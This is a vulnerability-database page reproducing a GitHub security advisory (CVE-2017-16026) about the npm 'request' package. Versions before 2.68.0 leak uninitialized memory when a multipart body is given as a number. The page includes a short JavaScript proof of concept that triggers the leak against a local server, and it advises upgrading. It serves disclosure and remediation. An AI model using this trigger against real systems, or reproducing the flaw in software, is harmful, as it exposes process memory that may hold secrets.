Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-7xfp-9c55-5vqj

GitHub Security Advisory

Remote Memory Exposure in request

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.

## Proof of Concept

```js
var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
```

## Recommendation

Update to version 2.68.0 or later

Affected Packages

npm request
Affected versions: 2.49.0 (fixed in 2.68.0)
npm request
Affected versions: 2.2.6 (fixed in 2.68.0)

Related CVEs

CVE-2017-16026

Key Information

GHSA ID
GHSA-7xfp-9c55-5vqj
Published
November 9, 2018 5:44 PM
Last Modified
September 12, 2023 6:48 PM
CVSS Score
5.0 /10
Primary Ecosystem
npm
Primary Package
request
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 3, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.